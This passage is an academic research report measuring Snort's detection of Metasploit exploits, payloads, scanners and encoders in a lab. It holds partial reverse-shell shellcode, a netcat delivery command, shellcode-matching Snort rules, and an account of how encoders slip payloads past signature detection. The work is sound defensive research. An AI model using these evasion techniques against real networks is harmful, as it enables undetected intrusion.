University of AmsterdamSystem & Network Engineering

IDS Project

Snorting Metasploit

Authors:Kevin de Kokkevin.dekok@os3.nl

Niek Timmersniek.timmers@os3.nl

Coordinator:Jeroen van Beek

University of Amsterdam

May 30, 2010

1

Management Summary

This research project is focused on the effectiveness of Snort against attackswhich can be found in Metasploit. Metasploit is publicly available and easy touse hackers tool which can be used to compromise servers on a network. Withinthis hacker hundreds of attacks can be found which are used to compromiseenterprise servers remotely via the network. Snort is an intrusion detection sys-tem which is capable of detecting malicious activities on a enterprise network.Thereby Snort could be an effective defense against Metasploit. We want toknow how effective Snort really is and if implementing it has additional valueto the security of the network.

The effectiveness of Snort is measured against the number of attacks fromMetasploit that were detected by it. Detection is done by Snort by known sig-natures which are defined in rules. These rules contain a string of characterswhich uniquely identifies an attack. The string matching is done by capturingall messages send via the network and comparing them with the defined ruleset. There are thousands of rules available in Snort for all kinds of software andoperating systems. Most rule sets are supplied by Snort but there are also rulesets which are provided by other companies and communities. This researchhas focuses on three different rule sets: default rule set (3000 rules), officialup-to-date rule set (5000 rules) and a rule set from an active community (14000rules). By comparing three different rule set we can give a complete conclusionon the effectiveness of Snort.

The ultimate goal of Metasploit is to stay under the radar of Snort andcomparable products. If the attacks in Metasploit would be easily detected bySnort it would make life for hackers a lot harder if Snort was implemented inevery network. However Snort is not implemented in every network and evenworse, Snort is not effective against the attacks found in Metasploit. By defaultseveral attacks are detected but for an attacker it is really easy to hide theseattacks. Within Metasploit there are several tools included in order to hidethe attacks. Our research has showed that hiding these attacks is really easyagainst the part of an attack which is responsible for giving the attacker accessto vulnerable servers in the network. Changing this part of the attack can becompared with simple math; 40 + 2 = 42 but also 84/2 = 42. The attack looksdifferent but the result is the same.

In order to test the actual effectiveness we have made network messagetraces of all the Windows attacks from Metasploit in order to read them withthe different Snort rule sets. This whole process was done automatically via acustom developed framework. The outcome of this process was that Snort isnot efficient against the attacks. Only one out of five attacks were detected inthe most efficient tested setup. Thereby we conclude that Snort is not capableof protecting a network by itself but that it is merely an additional brick to theentire security model of a network.

Kevin de KokNiek Timmers

May 30, 2010

CONTENTS 2

Contents

1 Introduction 41.1 Research . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41.2 Approach . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51.3 Lab Setup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61.4 Targets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61.5 Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7

2 Executing the Attacks 82.1 Introduction to Metasploit . . . . . . . . . . . . . . . . . . . . . . 82.2 Exploits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

2.2.1 Exploit: Automation . . . . . . . . . . . . . . . . . . . . . 92.3 Payloads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

2.3.1 Payloads: Automation . . . . . . . . . . . . . . . . . . . . 102.4 Scanners . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11

2.4.1 Scanners: Automation . . . . . . . . . . . . . . . . . . . . 112.5 Denial of Services . . . . . . . . . . . . . . . . . . . . . . . . . . . 12

2.5.1 Denial of Services: Automation . . . . . . . . . . . . . . . 122.6 Encoders . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12

2.6.1 Encoders: Automation . . . . . . . . . . . . . . . . . . . . 13

3 Detecting the Attacks 143.1 Introduction to Snort . . . . . . . . . . . . . . . . . . . . . . . . 14

3.1.1 Using Snort offline . . . . . . . . . . . . . . . . . . . . . . 143.2 Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14

3.2.1 Snort . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153.2.2 Emerging Threats . . . . . . . . . . . . . . . . . . . . . . 15

3.3 Analysing traffic from the Metasploit framework . . . . . . . . . 16

4 Effectiveness of Snort 174.1 Effectiveness . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17

5 Hiding Attacks 205.1 Code Obfuscation . . . . . . . . . . . . . . . . . . . . . . . . . . . 205.2 Encryption of the Data Stream . . . . . . . . . . . . . . . . . . . 215.3 Fragmented Packets . . . . . . . . . . . . . . . . . . . . . . . . . 225.4 Timing Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . 225.5 Slow Down Attack . . . . . . . . . . . . . . . . . . . . . . . . . . 225.6 Overloading Snort . . . . . . . . . . . . . . . . . . . . . . . . . . 22

6 Conclusion 236.1 Effectiveness . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236.2 Increase Effectiveness . . . . . . . . . . . . . . . . . . . . . . . . 236.3 Training Snort . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236.4 Unique Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24

Kevin de KokNiek Timmers

May 30, 2010

CONTENTS 3

6.5 Cat and Mouse . . . . . . . . . . . . . . . . . . . . . . . . . . . . 246.6 Obfuscating . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24

7 Future work 257.1 Metasploit Rule Set . . . . . . . . . . . . . . . . . . . . . . . . . 257.2 Clean Packet Traces . . . . . . . . . . . . . . . . . . . . . . . . . 257.3 Effect of Rule Parameters . . . . . . . . . . . . . . . . . . . . . . 25

A Exploits - Total: 266 28

B Payloads - Total: 101 30

C Scanners - Total: 96 31

D Denial of Service - Total: 37 33

E Encoders - Total: 16 33

F insert rules.rb 33

G insert attacks.rb 34

H dump attacks.rb 35

I dump payloads.rb 36

J transform payloads.rb 36

K send payloads.rb 37

L snort parse pcap 37

M meta-snort.sh 38

N honeyd.conf 41

Kevin de KokNiek Timmers

May 30, 2010

1 INTRODUCTION 4

1 Introduction

Intrusion detection systems[11] (IDS) are used to detect malicious traffic on anetwork. There are several IDS solutions available, our project will be focusedon Snort [1] which is an open source IDS solutions. The effectiveness of Snortis determined by its rules. Rules can be written manually but they are alsoprovided and maintained by Snort. It is not unlikely that within a companyonly these rules are used. Therefore it is important that these rules are effectiveagainst all sort of attacks.

“Hackers” and penetration testers[10] often make use of the Metasploit [2]framework. Within this framework you can find a variety of attacks which aredesigned to attack an operating system and its services. Roughly all commonattacks can be found in Metasploit. Metasploit is an open source solution andavailable for everyone, therefore you would assume that the attacks should bedetected by Snort. During our IDS labs we already concluded that this is clearlynot the case. We think it is interesting to see what the actual effectiveness is ofSnort against the attacks in Metasploit.

The answer is clear whether a default installation of Snort is effective againstexploits of the Metasploit framework. The question is however what a systemadministrator should do in order to get Snort more effective. One solution isto write rules manually for each attack. Another solution is implementing therules from a third party like Emerging Threats[3].

It is common practice for “hackers” to use well known executables for at-tacking their victims. These executables are easily detected by virus scanners.Thereby it is essential to modify these executables in order to hide it fromthe virus scanner. This approach also applies for the attacks within Metasploit.Viruses and the Metasploit attacks are usually identified by a signature in eitherthe executable or in the payload within the packet. We think it is interestingto know how difficult it is to hide known attacks from Snort.

1.1 Research

The project will be focused on answering the following research question:

What is the effectiveness of Snort against attacks which can be foundin Metasploit?

In to give an accurate and complete answer on the above question we willalso give an answer on the following sub questions:

1. Can a default installation of Snort detect attacks from Metasploit?

2. Can Snort be improved by applying 3rd party rules?

3. Can Snort detect attacks which are made undetectable by Metasploit?

4. Is it possible to make Snort more effective against the attacks in Metasploit?

Kevin de KokNiek Timmers

May 30, 2010

1 INTRODUCTION 5

1.2 Approach

The project will contain different stages which need to be completed first beforegoing to the next stage. The following stages can be defined:

Stage 1: Identify Targets The effectiveness of several Snort installationswill be tested during this project. Different operating systems and repositoriesmeans different versions of Snort which have a different rule set. There is aselection made of three different versions of Snort which from now on will beidentified as the targets. All targets and its rules are inserted in a database witha custom script.

snort 2.7.5 / snort 2.8.5 SF / snort 2.8.6 SF + ET+--------------+--------------+------+-----+---------+| Field | Type | Null | Key | Default |+--------------+--------------+------+-----+---------+| id | int(10) | NO | PRI | NULL || alert | varchar(10) | NO | | NULL || from_address | varchar(20) | NO | | NULL || from_port | varchar(10) | NO | | NULL || relation | varchar(5) | NO | | NULL || to_address | varchar(20) | NO | | NULL || to_port | varchar(10) | NO | | NULL || msg | varchar(100) | YES | | NULL |...| content | varchar(200) | YES | | NULL || rev | varchar(5) | YES | | NULL |+--------------+--------------+------+-----+---------+

The different versions of Snort are listed in subsection 1.3.

Stage 2: Identify Attacks Within the Metasploit there a are many attacksavailable. This research has not been focusing on all attacks but mainly onWindows attacks. However not all attacks are aimed for Windows. The selectionis done in order to finish within the project deadline. All attacks are inserted ina database with a custom script. All attacks are inserted in a similar databasewhere the last three columns are used to insert the sid of the rule that hastriggered an alert:

Exploits / Payloads / Dos / Scanners / Encoders+-------------+--------------+------+-----+---------+| Field | Type | Null | Key | Default |+-------------+--------------+------+-----+---------+| id | int(10) | NO | PRI | NULL || os | varchar(10) | NO | | NULL || type | varchar(20) | NO | | NULL || name | varchar(100) | NO | | NULL |

Kevin de KokNiek Timmers

May 30, 2010

1 INTRODUCTION 6

| quality | varchar(20) | NO | | NULL || description | varchar(200) | NO | | NULL || fedora | varchar(60) | YES | | NULL || centos | varchar(60) | YES | | NULL || ubuntu | varchar(60) | YES | | NULL |+-------------+--------------+------+-----+---------+

A list of all exploits can be found in section 2.

Stage 3: Dump Attacks In order to test all selected attacks against thedifferent targets there will be a packet trace made with tcpdump. To automatethis process the attacks are retrieved from the database with with a customscript and executed accordingly. How this process is done can be found insection 2.

Stage 4: Detect Attacks The packet traces are used to test the attacksagainst the different targets. This will be done automatically with a customscript. All results will be inserted into the database. How this process is donecan be found in section 3.

Stage 5: Retrieve Results All results will be retrieved from the databasewith a custom script. With this information we were able to form several strongconclusions which are actually the crown jewels of this research. How thisprocess is executed can be found in section 4.

1.3 Lab Setup

A lab setup will be used to conduct the research. This lab setup will be cre-ated using a Xen environment which is a powerful open source virtualizationplatform. Several virtual machines will be created on this platform in order tocreate different targets for our research.

Server Role Operating System VersionDatabase Server Ubuntu 9.04

Target 1 Ubuntu 8.04Target 2 CentOS 5.4Target 3 Fedora 12

Table 1: Xen lab setup

1.4 Targets

The focus of this research is on three installations of Snort. The first installa-tion is an installation from the Ubuntu 8.04 repositories. In these repositories

Kevin de KokNiek Timmers

May 30, 2010

1 INTRODUCTION 7

there is still an old version of Snort available. The second installation is aninstallation from the Centos 5.4 repositories including an up-to-date rule setfrom SourceFire[4] which is the official supplier of rules. The third installationis a manual installation retrieved from the official Snort website.

Snort Version Ruleset Nr. of RulesSnort 2.7.5 Repository 3971Snort 2.8.5 SourceFire 5522Snort 2.8.6 SourceFire, Emerging Threats 14309

Table 2: Select Snort installation

1.5 Attacks

This research will be focused on attacks which can be found in Metasploit. Theversion of Metasploit was at the beginning of this research 3.3.3. The attackswithin Metasploit can be divided in the following group: Exploits, Payloads,Auxiliary, Encoders and Nops. From these attacks several exploits will be se-lected for this research. A more detailed description of the selected attacks canbe found in section 2.

Kevin de KokNiek Timmers

May 30, 2010

2 EXECUTING THE ATTACKS 8

2 Executing the Attacks

All attacks from Metasploit that are included in this project were imported ina MySQL database. The scripts which were made in Ruby did a query on thedatabase in order loop through all the attacks. For every section a differentscripts is made to keep the type of attacks separated. A complete list of thescripts can be found in the appendix.

2.1 Introduction to Metasploit

The Metasploit framework is an open-source project focused on IT security.Within this framework multiple attacks can be found. The following type ofattacks can be found in Metasploit version 3.3.3 which was updated at thebeginning of this research:

_ _ _ _| | | | (_) |

_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_| ’_ ‘ _ \ / _ \ __/ _‘ / __| ’_ \| |/ _ \| | __|| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|

| ||_|

+ -- --=[ 481 exploits 266 included in this research ]=+ -- --=[ 192 payloads 101 included in this research ]=+ -- --=[ 103 scanners 96 included in this research ]=+ -- --=[ 49 dos 37 included in this research ]=+ -- --=[ 22 encoders 16 included in this research ]=+ -- --=[ 8 nops 0 included in this research ]=

=[ ]==[ Total Attacks Included: 516 ]=

In order to test the efficiency of Snort against this framework a selection ofattacks are selected. Not all attacks are included because this scope is simply abit too big for this project. Thereby we have selected mostly Windows attacks.The attacks include exploits, payloads, scanners, denial of services and encoders.Several attacks are excluded because they simply did not execute as expected.It was not possible to create a genuine trace of these attacks.

The attacks are not fully comparable to each other and thereby should nothave the same weight in our results. For example the it is not possible to use theencoders in order to attack a host system. An encoder is used for obfuscatinga payload. However all attacks are seen equal in our statistics because even ifthe attacks are not equal, they all result in a compromised system if successful.

Kevin de KokNiek Timmers

May 30, 2010

2 EXECUTING THE ATTACKS 9

2.2 Exploits

An exploit is a piece of code, sequence of commands or a specific chunk ofdata that takes advantage of a bug or vulnerability in software in order to gaincontrol over the host system. An exploit makes it possible to execute a payloadwhich is the actual malicious code which gives the hacker access to the targetsystem. Within Metasploit a number of 481 exploits can be found of which250 are Windows exploits. All exploits included in this project are aimed atWindows and applications that run on Windows. A full list of all the payloadsincluded in this project can be found in appendix A.

2.2.1 Exploit: Automation

A Ruby script is responsible for automating the execution of all exploits. For allexploits executed the windows/shell/reverse tcp payload is used. A tcpdumptrace is made with the script. In order to capture the exploit in a tcpdumptrace the following steps are executed by the script:

1. Query the database for the list with exploits

2. Create packet trace of the exploit

(a) Open tcpdump and output to a unique file

(b) Start Honeyd with udp/tcp ports 1-65535 open N

(c) Start farpd to direct traffic to a virtual IP address[12]

(d) Execute exploit to the target server

(e) If an attack failed log this to a file.

(f) Kill tcpdump.

3. Goto next payload.

All failed exploits are inspected manually. Usually a parameter was not set,thereby failing the exploit. By changing the parameters manually it was stillpossible to create a packet trace. Some times the exploit simply did not work asexpected. If this happened these exploits were excluded from the results. Thescript can be found in appendix H.

2.3 Payloads

The payloads[8] in Metasploit are shellcodes which are executed when an exploitis succesfull.A shellcode is a piece of assembly which is called this way becauseit usually starts a command shell for the attacker. However, shellcode is notlimited to starting a shell. Within the Metasploit there are 192 payloads of which83 are included in this project. All payloads included are Windows payloads.A full list of all the payloads included in this project can be found in appendixB.

Kevin de KokNiek Timmers

May 30, 2010

2 EXECUTING THE ATTACKS 10

2.3.1 Payloads: Automation

The payloads are exported out of Metasploit in a ruby format I. This formatcontains simply a variable called buf which contains the shellcode. An exampleof the exported payload would be:

buf ="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +..."\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61" +"\x74\x6f\x72\x73\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69" +"\x74\x20\x2f\x41\x44\x44\x00"

A simple script K is used to send the payload via netcat to the target server.However in order to do that some changes are needed to the exploit. A scriptJ changes the payload in the following way to be able to execute it with Rubyand send it via netcat to the target server:

• Add buf=‘’ to the top of the file.

• Change buf = to buf +=. This is needed if the payload consists of multiplevariables. For example staged payloads use multiple variable which areboth named buf.

• Add puts buf to the end of the file.

The above will result in the following ruby script for each payload which canbe executed:

buf = ‘’buf +="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +..."\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61" +"\x74\x6f\x72\x73\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69" +"\x74\x20\x2f\x41\x44\x44\x00"puts buf

When executed, this will output binary data on the terminal. Thereby it ispossible to send this binary output via netcat on a specific port on our targets.In order to accomplish this the following command is executed for all payloadswhich pipes the binary output to netcat:

ruby payload.rb |nc target_server_ip port

To add it all up, the script is responsible for executing the following steps:

Kevin de KokNiek Timmers

May 30, 2010

2 EXECUTING THE ATTACKS 11

1. Query the database for the list with encoders

2. Create packet trace of the encoded payload

(a) Execute msfpayload to output the payload in ruby format2.3.1

(b) Transform the payloads to executable ruby code

(c) Open tcpdump and output to a unique file

(d) Start Honeyd with udp/tcp ports 1-65535 open N

(e) Start farpd to direct traffic to a virtual IP

(f) Send the exploit to the target system with netcat

(g) Log all failed attempts

(h) Kill tcpdump

3. Goto next payload

2.4 Scanners

Within the Metasploit framework there are 103 scanners which are located in theauxiliary section. Most scanners are developed to scan for a specific vulnerabilityon certain host machines. An attacker could use these scanners in order to findits victim in a network, thereby it is quite important that Snort will be able todetect this. A full list of all the scanners included in this project can be foundin appendix C.

2.4.1 Scanners: Automation

Of all scanners there is a trace made in a similar fashion as the exploits. TheRuby script which is responsible for the auotmation is thereby also very similarto the exploit automation script. The script executed the following steps:

1. Query the database for the list with scanners

2. Create packet trace of the scanner

(a) Open tcpdump and output to a unique file

(b) Start Honeyd with udp/tcp ports 1-65535 open N

(c) Start farpd to direct traffic to a virtual IP address[12]

(d) Start scanner to the target server

(e) If a scanner failed log this to a file

(f) Kill tcpdump

3. Goto next scanner

All failed scanners are inspected manually. Usually a parameter was not set,thereby failing the scanner. By changing the parameters manually it was stillpossible to create a packet trace.

Kevin de KokNiek Timmers

May 30, 2010

2 EXECUTING THE ATTACKS 12

2.5 Denial of Services

One of the oldest and most common attack for a host system are denial ofservice attacks. They harm the system in a way it cannot function properlyor just crashes. Usually a denial of service sends or executes a specific setof commands or strings to a vulnerable application or system. Within theMetasploit framework there are 49 denial of services included of which 37 areincluded in this research. A full list of all the denial of services included in thisproject can be found in appendix D.

2.5.1 Denial of Services: Automation

It was possible to make the traces of the denial of services in similar way as theexploits and scanners. The script we made executed the following steps in orderto create the traces:

1. Query the database for the list with denial of services

2. Create packet trace of the denial of service

(a) Open tcpdump and output to a unique file

(b) Start Honeyd with udp/tcp ports 1-65535 open N

(c) Start farpd to direct traffic to a virtual IP address[12]

(d) Execute denial of service to the target server

(e) If a denial of service failed log this to a file

(f) Kill tcpdump

3. Goto next denial of service

It was not possible to create clear traces of several denial of services withinthe Metasploit framework. These failed ones have been excluded from the re-search.

2.6 Encoders

Encoders are used to obfuscate[5] the paylaod of an exploit. Within the Metas-ploit framework there are multiple encoders. It is possible to encode a payloadnumerous times which should introduce a harder to detect encoder. Usually theknown payloads are easily detectable by intrusion detection systems. Howeverby obfuscating the code it is possible to hide these well known paylaods forthe radar of the intrusion detection system. This reaserch included all encoderswhich adds up to a total of 16. A full list of all the encoders included in thisproject can be found in appendix E.

Kevin de KokNiek Timmers

May 30, 2010

2 EXECUTING THE ATTACKS 13

2.6.1 Encoders: Automation

In order to automate the process of detecting the encoders[6][7][9] against Snortthere were also packet traces made. To test the encoders we picked an payloadwhich was detected by all Snort versions and obfuscated this payload with allencoders. Thereby we could test if Snort was still able to detect the payloadafter it was obfuscated. The script that was responsible for making these tracesdid that in the following way:

1. Query the database for the list with encoders

2. Create packet trace of the encoded payload

(a) Execute msfpayload to output the payload in ruby format2.3.1

(b) Pipe the output to msfencode to obfuscate the payload

(c) Transform the payloads to executable ruby code

(d) Open tcpdump and output to a unique file

(e) Start Honeyd with udp/tcp ports 1-65535 open N

(f) Start farpd to direct traffic to a virtual IP

(g) Send the exploit to the target system with netcat

(h) Log all failed attempts

(i) Kill tcpdump

3. Goto next encoder

There were six encoders not functioning probably. Some of them are alreadyon the Metasploit bug list and planned to be repaired in Metasploit version 3.4.0[16].

Kevin de KokNiek Timmers

May 30, 2010

3 DETECTING THE ATTACKS 14

3 Detecting the Attacks

3.1 Introduction to Snort

Snort is an IDS and IPS platform developed by Sourcefire. Snort makes usageof protocol analysis and content searching/matching to detect and recognisevarious network based attacks. It can also detect other attacks and probes suchas buffer overflows, port scans, OS fingerprinting and more. The signatures arewritten in rules. Snort is available on almost every Linux distribution in theirrepositories. Own created rules can be easily be implemented in Snort. Thedetecting engine of Snort utilizes a modular plug-in architecture. The primaryuses are:

• Packet sniffer

• Packet logger

• Intrusion detection/prevention system

With enhancements from the Open Source community Snort can also bean IPS. Firewalls can block ip’s based on events from Snort. In this reasearchproject Snort is only used to analyse pcap files.

3.1.1 Using Snort offline

Snort can be used as offline tool to analyse pcap-files and parse to contentfrom it. Snort uses it’s ruleset to analyses the pcap-file. In the setup Snort isexecuted with the following command:

snort -k none -A fast -c /etc/snort/snort.conf -r pcap_file

The ”k” argument disables the checksum option in Snort, this is neededbecause the captured network traffic contains other ip’s then ip address fromthe machine where Snort is installed on. If this option is enabled a lot of packetsremain undetected by Snort. The second argument ”A fast” is the alert modeof Snort, this option writes an alert message to the logfile; /var/log/snort/alert,this is needed because the alert is used for correlating an attack with a triggerdrule. The third argument ”c” is needed to read the snort configuration file, inthis file all the snort options can be configured, including the rulesets. And thelast option ”r” is used to read the pcap-file.

3.2 Rules

The rules provided by Sourcefire are developed by the Vulnerability ResearchTeam(VRT). This team does research into newest exploits, malware, hack at-tempts and create rulesets based on those subjects. Below an example of a ruleis displayed:

Kevin de KokNiek Timmers

May 30, 2010

3 DETECTING THE ATTACKS 15

alert ip \$EXTERNAL_NET \$SHELLCODE_PORTS -> \$HOME_NET any(msg:"SHELLCODE x86 NOOP"; content:"aaaaaaaaaaaaaaaaaaaaa";classtype:shellcode-detect; sid:1394; rev:5;)

The latest rules can be bought from Sourcefire, after 30 days those rules arefree to download and given to the community.

There are also other Open Source community which also contribute to Snortwith their own rules and modifications to Snort. Emerging threats providesthird party rules to intergrate into Snort.

3.2.1 Snort

In our labsetup we use three installations of Snort. Two installations from therepository from the underlaying Linux distribution. No additional changes aredone in the configuration file of Snort, only the provided rules are enabled. Thethird installation is a bleeding edge installation with the newest version of Snortand also rules applied in it’s configuration from the Open Source communityEmerging Threats(ET).

The following versions are used:

• Ubuntu 8.0.4, Snort 2.7.0

• CentOS 5.4, Snort 2.8.6

• Fedora 5, Snort 2.8.6 + ET

The rules that are provided within the Snort package from the distributionspackage repository are used in the setup.

3.2.2 Emerging Threats

Emerging threats is an community which does their own research into vulner-abilities, malware and other forms of malicious network related software andattacks. It received recently funding from the Army Research Office and theNational Science Foundation to continue to develop their project. Emergingthreats also provide a patch for Snort to make the rules compatible with pro-prietary and Open Source versions of firwalling mechanisms suchs as:

• Packet Filter(*BSD)

• Iptables(Linux)

• Cisco ACLs

• Cisco Pix

• Checkpoint

• Microsoft ISA Server

Different Snort events can be translated into firewall rules from the vendorslisted above.

Kevin de KokNiek Timmers

May 30, 2010

3 DETECTING THE ATTACKS 16

3.3 Analysing traffic from the Metasploit framework

To correlate the generated traffic from Metasploit with the rules in the differentsetups from Snort the following steps are taken to analyse the captured traffic:

(a) Write starting point to /var/log/snort/alert;

(b) Analyse the pcap file with Snort;

(c) Write amount of alerts to a temporay log file;

(d) Write end point to /var/log/snort/alert;

(e) Parse the log file /var/log/snort/alert for Snort alert message;

(f) If Alert; write SnortID + name of attack to database; else write ”NOTDETECTED” to database

An example from /var/log/snort/alert log file is displayed below:

B mysql_login05/08-22:27:54.251582 [**] [1:2010937:2] ET POLICY Suspicious \inbound to mySQL port 3306 [**] \[Classification: Potentially Bad Traffic] [Priority: 2] {TCP} \172.16.0.2:38936 -> 172.16.0.4:3306E mysql_login

Metasploit attack in Snort logfile.

The first line in the log entry starts with delimiter ”B” + exploit name. Onthe second line the Snort rule which is triggerd by the attack from Metasploit iswritten. The triggerd Snort rule; 2010973 is added to the database correlatedwith the name from the Metasploit attack. Then an ending delemiter ”E” +exploit name. The process of parsing pcap-file with Snort is automated with ascript. The script is provided in appendix L.

Kevin de KokNiek Timmers

May 30, 2010

4 EFFECTIVENESS OF SNORT 17

4 Effectiveness of Snort

In this section the effectiveness is Snort is described. The calculation of theeffectiveness is based on the amount of attacks that are used and on the amountof attacks that are detected by Snort.

The percentage of the successful detection per attack is determined by thefollowing formula:

detected_attacks / available_attacks * 100 = detected average

The total effectivity of the attacks on each Snort instance is calculated bythe following formula:

total_detected_attacks / total_available_attacks * 100 = total_detected average

The process of calculating the average from the successful attacks is doneby a script. This script query’s the database by attack type(exploit, payloads,etc..) and calculates the results. The script can be found in appendix M.

4.1 Effectiveness

In this section the overall results are displayed with the average detection fromthe different version of Snort. To achieve the maximum results of effectivenessdifferent Snort options are enabled. The shellcode option on Snort is enabledto check for shellcode in the network traffic on all ports. Shellcode can be foundin the payload of the packets. More information about payloads can be foundin subsection2.3. The following preprocessors are enabled:

• stream 5

• http preprocessor

• rpc decoder

• back orifice detector

• ftp normalizer

• telnet normalizer

• smtp normalizer

• portscan normalizer

• dns preprocessor

The stream5 preprocessor is used to detect tcp packets with invalid flagcombinations, this preprocessor does also detect different types of portscans.The http preprocessor is used to detect possible invalid http traffic. Furthermorethe rpc traffic decoder is enabled to detect exploits2.2 on the dcom ports by

Kevin de KokNiek Timmers

May 30, 2010

4 EFFECTIVENESS OF SNORT 18

decoding SMB traffic. The back orifice decoder is used to detect back orificeattacks. The ftp and telnet preprocessor are used for packet inspection on theirstreams. It checks for ftp commands and responses. It can also detect anomaliesfrom the telnet traffic and for buffer overflows. The smtp normalizer checksthe smtp commands for possible buffer overflows. The portscan normalizer isconfigured to detect portscans. Furthermore the dns preprocessor is used todetect exploits which can be used in dns. The last part of the configurationconsist of all Snort rules enabled. The amount of loaded rules differs in eachsetup. In section:1.4 an overview can be found about the loaded rules. Withthose options enabled Snort is configured with a possible high detection rate.

Attack type Total attacks Detected attacks Average detectedExploits 266 48 18%Payloads 101 15 15%DoS 37 1 2%Scanners 96 0 0%Encoders 16 1 6.3%Total 516 65 12.6%

Effectiveness of Snort 2.7.0

Attack type Total attacks Detected attacks Average detectedExploits 266 22 8.3%Payloads 101 14 13.9%DoS 37 2 5.4%Scanners 96 9 9.4%Encoders 16 1 6.3%Total 516 48 9.3%

Effectiveness of Snort 2.8.6

Kevin de KokNiek Timmers

May 30, 2010

4 EFFECTIVENESS OF SNORT 19

Attack type Total attacks Detected attacks Average detectedExploits 266 62 23.3%Payloads 101 27 26.7%DoS 37 2 5.4%Scanners 96 9 9.4%Encoders 16 1 6.3%Total 516 101 19.6%

Effectiveness of Snort 2.8.6 + ET

When comparing the detected exploits from version 2.7.0 with version 2.8.6one can say that you are better of with a Snort version from the Ubuntu 8.04installation then one from Sourcefire. The extra ruleset from the from Emerg-ing Threats provides 15% more detection rate on the exploits and 12.8% onthe payloads compared with version 2.8.6. When comparing version 2.7.0 with2.8.6(ET) then 2.7.0 detects 5.3% less exploits and 11.7% less payloads. Theamount of detected scanners is from 2.8.6 and 2.8.6(ET) the same. One can saythat those rules are not provided with the installation of Ubuntu. The amountof detected encoders is the same for all three versions of Snort. The ruleset fromEmerging Threats only provides aditional value to detect payloads end exploits.The amount of detected attacks of the types: dos, scanners and encoders re-main the same between version 2.8.6 and 2.8.6(ET). The detection rate of theencoders is the same in all three versions of Snort. Snort 2.7.0 does not detectany of the scanners and it does detect 2% of the DoS attacks compared withboth other versions.

The total result from Snort 2.7.0 and Snort 2.8.6 detecting attacks differsfrom each other. Snort version 2.7.0 has 1800 less rules loaded, but it detects3.3% more attacks from Metasploit. One could say that the rules that are pro-vided with Ubuntu are more effective then those provided by Sourcefire. Snortonly detects only 19.6% of the total attacks, this is with the latest ruleset fromEmerging Threats. This means that 80.4% of the attacks remain undetected.One can say that this forms a serious threat.

Kevin de KokNiek Timmers

May 30, 2010

5 HIDING ATTACKS 20

5 Hiding Attacks

In this section multiple ways to hide attacks from Snort are described. Hidingcan be done on different layers; eg, encryption, code obfuscation. Hiding meanssuccessfully apply an attack without getting noticed by an IDS.

5.1 Code Obfuscation

Usually payloads are easily detectable because they are often reused and therebyand easy target for detection. However there are complicated obfuscating schemesavailable in the Metasploit framework that are easy to use. These obfuscatersare called encoders. Within the Metasploit framework there is an selection of22 encoders which are all capable of obfuscating a payload. Obfuscating codecan be compared with an easy math calculation. For the following calculationyou would get the same result but the actual calculation is different:

1. 40 + 2 = 42

2. 84/2 = 42

3. 420/10 = 42

The above calculations are kind of comparable to encoders in the way thatencoding a payload will look like a different piece of code but it will do the same.

All coders (except 1) resulted in an undetected payload. This was tested bywriting a Snort rule which was capable of detecting the following payload:

windows/shell/reverse_tcp

buf +=

"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +

"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +

...

"\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff" +

"\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff" +

"\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"

The written rule for Snort which checks for the hex values 8B 52 14 8B in apacket which are located on the second line of the payload:

alert tcp any any -> any any (msg:"niek"; content:"|8B 52 14 8B|"; )

There is actually one encoder that encodes any payload, detectable or unde-tectable, in such a way that this encoder is not advisable to use. This encoderis:

x86/single_static_bit.rb

What this encoder does is adding multiple NOP’s (0x90) [17] to the payloadwhich will result in triggering a rule on all installations of Snort included in thisresearch:

Kevin de KokNiek Timmers

May 30, 2010

5 HIDING ATTACKS 21

buf +=

"\xed\xff\x83\xfd\x08\x75\x05\x83\xef\xff\x31\xed\x90\x90" +

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" +

...

"\x3b\x38\x6b\xa7\xa1\xa0\xe0\xbc\x7c\x2d\x66\x72\x31\x20" +

"\xb6\x2a\x31\x37\x2f\x26\x73\x39\x78\xf8\x72\x2d\x64\x60" +

"\xb0"

Using this encoder is actually the worst case scenario for an attacker: obfuscatinga possible undetected payload into a detectable payload.

5.2 Encryption of the Data Stream

